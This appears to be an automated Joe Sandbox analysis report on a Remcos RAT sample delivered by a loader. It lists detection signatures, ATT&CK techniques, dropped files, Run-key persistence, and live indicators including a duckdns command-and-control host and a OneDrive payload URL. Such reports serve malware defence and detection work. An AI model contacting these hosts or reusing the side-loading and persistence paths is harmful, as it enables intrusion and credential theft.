                  Source: Yara matchFile source: 00000005.00000002.4443196477.0000000000407000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2153175404.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 2800, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 2380, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\ffrrdds\logs.dat, type: DROPPED
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: cmd.exe5_2_0466569A
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: cmd.exe8_2_1C63569A

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting                  		1
                  Valid Accounts                  		1
                  Native API                  		1
                  Scripting                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		12
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Command and Scripting Interpreter                  		1
                  DLL Side-Loading                  		1
                  Bypass User Account Control                  		2
                  Obfuscated Files or Information                  		111
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol111
                  Input Capture                  		21
                  Encrypted Channel                  		Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts2
                  Service Execution                  		1
                  Valid Accounts                  		1
                  Valid Accounts                  		1
                  DLL Side-Loading                  		2
                  Credentials In Files                  		1
                  System Service Discovery                  		SMB/Windows Admin Shares3
                  Clipboard Data                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  Windows Service                  		11
                  Access Token Manipulation                  		1
                  Bypass User Account Control                  		NTDS1
                  System Network Connections Discovery                  		Distributed Component Object ModelInput Capture1
                  Remote Access Software                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd1
                  Registry Run Keys / Startup Folder                  		1
                  Windows Service                  		11
                  Masquerading                  		LSA Secrets2
                  File and Directory Discovery                  		SSHKeylogging2
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                  Process Injection                  		1
                  Valid Accounts                  		Cached Domain Credentials34
                  System Information Discovery                  		VNCGUI Input Capture213
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                  Registry Run Keys / Startup Folder                  		1
                  Virtualization/Sandbox Evasion                  		DCSync131
                  Security Software Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                  Access Token Manipulation                  		Proc Filesystem1
                  Virtualization/Sandbox Evasion                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                  Process Injection                  		/etc/passwd and /etc/shadow3
                  Process Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  Application Window Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                  System Owner/User Discovery                  		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1428364 Sample: XY2I8rWLkM.exe Startdate: 18/04/2024 Architecture: WINDOWS Score: 100 52 jantis.duckdns.org 2->52 54 web.fe.1drv.com 2->54 56 6 other IPs or domains 2->56 60 Snort IDS alert for network traffic 2->60 62 Found malware configuration 2->62 64 Malicious sample detected (through community Yara rule) 2->64 68 14 other signatures 2->68 8 XY2I8rWLkM.exe 1 7 2->8         started        13 Ocihlomc.PIF 2->13         started        15 Ocihlomc.PIF 2->15         started        signatures3 66 Uses dynamic DNS services 52->66 process4 dnsIp5 58 dual-spov-0006.spov-msedge.net 13.107.139.11, 443, 49704, 49705 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 8->58 40 C:\Users\Public\Libraries\netutils.dll, PE32+ 8->40 dropped 42 C:\Users\Public\Libraries\easinvoker.exe, PE32+ 8->42 dropped 44 C:\Users\Public\Ocihlomc.url, MS 8->44 dropped 46 C:\Users\Public\Libraries\Ocihlomc, data 8->46 dropped 86 Writes to foreign memory regions 8->86 88 Allocates memory in foreign processes 8->88 90 Creates a thread in another existing process (thread injection) 8->90 17 colorcpl.exe 5 17 8->17         started        22 extrac32.exe 1 8->22         started        24 cmd.exe 1 8->24         started        92 Multi AV Scanner detection for dropped file 13->92 94 Machine Learning detection for dropped file 13->94 96 Injects a PE file into a foreign processes 13->96 26 SndVol.exe 13->26         started        28 colorcpl.exe 15->28         started        file6 signatures7 process8 dnsIp9 48 jantis.duckdns.org 103.186.117.171, 1188, 49707 AARNET-AS-APAustralianAcademicandResearchNetworkAARNe unknown 17->48 50 geoplugin.net 178.237.33.50, 49708, 80 ATOM86-ASATOM86NL Netherlands 17->50 34 \Device\ConDrv, ISO-8859 17->34 dropped 36 C:\ProgramData\ffrrdds\logs.dat, data 17->36 dropped 70 Contains functionality to bypass UAC (CMSTPLUA) 17->70 72 Detected Remcos RAT 17->72 74 Contains functionalty to change the wallpaper 17->74 76 Contains functionality to register a low level keyboard hook 17->76 30 conhost.exe 17->30         started        38 C:\Users\Public\Libraries\Ocihlomc.PIF, PE32 22->38 dropped 78 Drops PE files with a suspicious file extension 22->78 32 conhost.exe 24->32         started        80 Contains functionality to steal Chrome passwords or cookies 26->80 82 Contains functionality to steal Firefox passwords or cookies 26->82 84 Delayed program exit found 26->84 file10 signatures11 process12

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  XY2I8rWLkM.exe53%ReversingLabsWin32.Trojan.Remcos
                  XY2I8rWLkM.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\Public\Libraries\netutils.dll100%AviraTR/AVI.Agent.rqsyc
                  C:\Users\Public\Libraries\Ocihlomc.PIF100%Joe Sandbox ML
                  C:\Users\Public\Libraries\Ocihlomc.PIF53%ReversingLabsWin32.Trojan.Remcos
                  C:\Users\Public\Libraries\easinvoker.exe0%ReversingLabs
                  C:\Users\Public\Libraries\netutils.dll45%ReversingLabsWin64.Trojan.Generic

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl00%URL Reputationsafe
                  https://sectigo.com/CPS00%URL Reputationsafe
                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                  http://ocsp.sectigo.com00%URL Reputationsafe
                  http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#0%URL Reputationsafe
                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
                  http://geoplugin.net/json.gp100%URL Reputationphishing
                  http://geoplugin.net/json.gp/C100%URL Reputationphishing
                  http://ocsp.sectigo.com0C0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  dual-spov-0006.spov-msedge.net
                  		13.107.139.11
                  		truefalse
                    		unknown
                    jantis.duckdns.org
                    		103.186.117.171
                    		truetrue
                      		unknown
                      geoplugin.net
                      		178.237.33.50
                      		truefalse
                        		unknown
                        onedrive.live.com
                        		unknown
                        		unknownfalse
                          		high
                          gjc1pa.dm.files.1drv.com
                          		unknown
                          		unknownfalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            jantis.duckdns.orgtrue
                              		unknown
                              http://geoplugin.net/json.gptrue
                              • URL Reputation: phishing
                              		unknown
                              https://onedrive.live.com/download?resid=38773C188FECDED2%21107&authkey=!APdTZ0yd8fEkIVsfalse
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://gjc1pa.dm.files.1drv.com/XY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://gjc1pa.dm.files.1drv.com/y4m5jEZDAORJUhy5vxdvGivD8AK7KXuBMHd6mI9R-9NoISk9eoRi5CGeKvx95WShCc-XY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://sectigo.com/CPS0XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://ocsp.sectigo.com0XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://gjc1pa.dm.files.1drv.com/y4mpj9fRwfOnuyzM7YwI58jRvZ-dYfMjomP1KUnTARA567zRfUcLOtOoq9VQbjgVxqrXY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://geoplugin.net/#Ycolorcpl.exe, 00000005.00000003.2049864957.000000000046A000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2049726907.000000000045F000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://geoplugin.net/json.gp~6colorcpl.exe, 00000005.00000003.2049726907.0000000000451000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4443196477.0000000000451000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://geoplugin.net/colorcpl.exe, 00000005.00000003.2049864957.000000000046A000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4443196477.000000000045F000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2049726907.000000000045F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://geoplugin.net/json.gp/Ccolorcpl.exe, 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmptrue
                                            • URL Reputation: phishing
                                            		unknown
                                            http://geoplugin.net/json.gpc6colorcpl.exe, 00000005.00000003.2049726907.0000000000451000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://onedrive.live.com/JXY2I8rWLkM.exe, 00000000.00000002.2026131247.000000000078A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://gjc1pa.dm.files.1drv.com:443/y4m5jEZDAORJUhy5vxdvGivD8AK7KXuBMHd6mI9R-9NoISk9eoRi5CGeKvx95WSXY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://live.com/XY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://geoplugin.net/json.gpJ6colorcpl.exe, 00000005.00000003.2049726907.0000000000451000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://geoplugin.net/json.gpXcolorcpl.exe, 00000005.00000002.4443196477.0000000000407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://onedrive.live.com/download?resid=38773C188FECDED2%21107&authkey=XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013C40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://geoplugin.net/json.gpm6colorcpl.exe, 00000005.00000003.2049726907.0000000000451000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://www.pmail.comXY2I8rWLkM.exe, XY2I8rWLkM.exe, 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2027190578.000000000228A000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2051616049.000000007FC10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://ocsp.sectigo.com0CXY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              13.107.139.11
                                                              		dual-spov-0006.spov-msedge.netUnited States
                                                              		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                              103.186.117.171
                                                              		jantis.duckdns.orgunknown
                                                              		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue
                                                              178.237.33.50
                                                              		geoplugin.netNetherlands
                                                              		8455ATOM86-ASATOM86NLfalse

                                                              General Information

                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                              Analysis ID:1428364
                                                              Start date and time:2024-04-18 21:26:05 +02:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 10m 29s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:13
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:XY2I8rWLkM.exe
                                                              renamed because original name is a hash value
                                                              Original Sample Name:29af19382bdeadee6d93b98f354e703d.exe
                                                              Detection:MAL
                                                              Classification:mal100.rans.troj.spyw.expl.evad.winEXE@16/11@4/3
                                                              EGA Information:
                                                              • Successful, ratio: 100%
                                                              HCA Information:
                                                              • Successful, ratio: 100%
                                                              • Number of executed functions: 91
                                                              • Number of non-executed functions: 225
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                              • Excluded IPs from analysis (whitelisted): 13.107.42.12
                                                              • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, odc-dm-files-geo.onedrive.akadns.net, odc-dm-files-brs.onedrive.akadns.net, l-0003.l-msedge.net, ocsp.digicert.com, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, dm-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • VT rate limit hit for: XY2I8rWLkM.exe

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              21:26:50API Interceptor2x Sleep call for process: XY2I8rWLkM.exe modified
                                                              21:26:56AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Ocihlomc C:\Users\Public\Ocihlomc.url
                                                              21:27:04API Interceptor2x Sleep call for process: Ocihlomc.PIF modified
                                                              21:27:04AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Ocihlomc C:\Users\Public\Ocihlomc.url
                                                              21:27:28API Interceptor7701524x Sleep call for process: colorcpl.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              13.107.139.11Signed Proforma Invoice 3645479_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                ORDER-CONFIRMATION-DETAILS-000235374564.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                  20240416-703661.cmdGet hashmaliciousDBatLoaderBrowse
                                                                    20240416-703661.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                      disktop.pif.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                        Oeyrmdo.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                          z15ORDERBR2024-B001054840.vbsGet hashmaliciousUnknownBrowse
                                                                            FT-3-TL-BALANCE,jpg.cmdGet hashmaliciousDBatLoaderBrowse
                                                                              PO3488-0337.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                https://1drv.ms/f/s!Ah3RUujFpGTrbZcZBXk_HMFtmRQGet hashmaliciousUnknownBrowse
                                                                                  103.186.117.1712020.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                    178.237.33.502020.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                    • geoplugin.net/json.gp
                                                                                    dhl_doc_awb_shipping_invoice_18_04_2024_000000000000024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                    • geoplugin.net/json.gp
                                                                                    tu.exeGet hashmaliciousRemcosBrowse
                                                                                    • geoplugin.net/json.gp
                                                                                    RFQ.NO. S70-23Q-1474-CS-P.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                    • geoplugin.net/json.gp
                                                                                    F873635427.vbsGet hashmaliciousRemcos, XWormBrowse
                                                                                    • geoplugin.net/json.gp
                                                                                    F873635427.vbsGet hashmaliciousRemcos, XWormBrowse
                                                                                    • geoplugin.net/json.gp
                                                                                    5FU4LRpQdy.rtfGet hashmaliciousRemcosBrowse
                                                                                    • geoplugin.net/json.gp
                                                                                    awb_shipping_documents_17_04_2024_00000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                    • geoplugin.net/json.gp
                                                                                    EFEMACPedido0180040240418.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                    • geoplugin.net/json.gp
                                                                                    Quotation 20241804.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                    • geoplugin.net/json.gp

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    jantis.duckdns.org2020.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                    • 103.186.117.171
                                                                                    dual-spov-0006.spov-msedge.net2020.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                    • 13.107.137.11
                                                                                    Signed Proforma Invoice 3645479_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                    • 13.107.139.11
                                                                                    ORDER-CONFIRMATION-DETAILS-000235374564.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                    • 13.107.139.11
                                                                                    RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                    • 13.107.137.11
                                                                                    20240416-703661.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                    • 13.107.139.11
                                                                                    20240416-703661.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                    • 13.107.139.11
                                                                                    disktop.pif.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                    • 13.107.139.11
                                                                                    https://1drv.ms/o/s!AhT23e1MofOfpnjbpE9m51fOcII5?e=K3DPPGGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                    • 13.107.137.11
                                                                                    Oeyrmdo.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                    • 13.107.137.11
                                                                                    Oeyrmdo.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                    • 13.107.137.11
                                                                                    geoplugin.net2020.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                    • 178.237.33.50
                                                                                    dhl_doc_awb_shipping_invoice_18_04_2024_000000000000024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                    • 178.237.33.50
                                                                                    tu.exeGet hashmaliciousRemcosBrowse
                                                                                    • 178.237.33.50
                                                                                    RFQ.NO. S70-23Q-1474-CS-P.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                    • 178.237.33.50
                                                                                    F873635427.vbsGet hashmaliciousRemcos, XWormBrowse
                                                                                    • 178.237.33.50
                                                                                    F873635427.vbsGet hashmaliciousRemcos, XWormBrowse
                                                                                    • 178.237.33.50
                                                                                    5FU4LRpQdy.rtfGet hashmaliciousRemcosBrowse
                                                                                    • 178.237.33.50
                                                                                    awb_shipping_documents_17_04_2024_00000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                    • 178.237.33.50
                                                                                    EFEMACPedido0180040240418.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                    • 178.237.33.50
                                                                                    Quotation 20241804.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                    • 178.237.33.50

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    AARNET-AS-APAustralianAcademicandResearchNetworkAARNe2020.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                    • 103.186.117.171
                                                                                    Ja84Oghm6q.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 103.167.88.226
                                                                                    eHFldFkJF4.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 103.167.88.226
                                                                                    Y83sPRpb9c.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 103.167.88.226
                                                                                    AXMdzuyn1m.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 103.167.88.226
                                                                                    c1N1s54Xz4.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 103.167.88.226
                                                                                    sNUnKpshtR.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 103.167.88.226
                                                                                    c3S6vyQXOw.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 103.167.88.226
                                                                                    MQ9rEJYn2l.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 103.167.88.226
                                                                                    E3kpuuuOfy.elfGet hashmaliciousMiraiBrowse
                                                                                    • 130.56.210.55
                                                                                    ATOM86-ASATOM86NL2020.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                    • 178.237.33.50
                                                                                    dhl_doc_awb_shipping_invoice_18_04_2024_000000000000024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                    • 178.237.33.50
                                                                                    tu.exeGet hashmaliciousRemcosBrowse
                                                                                    • 178.237.33.50
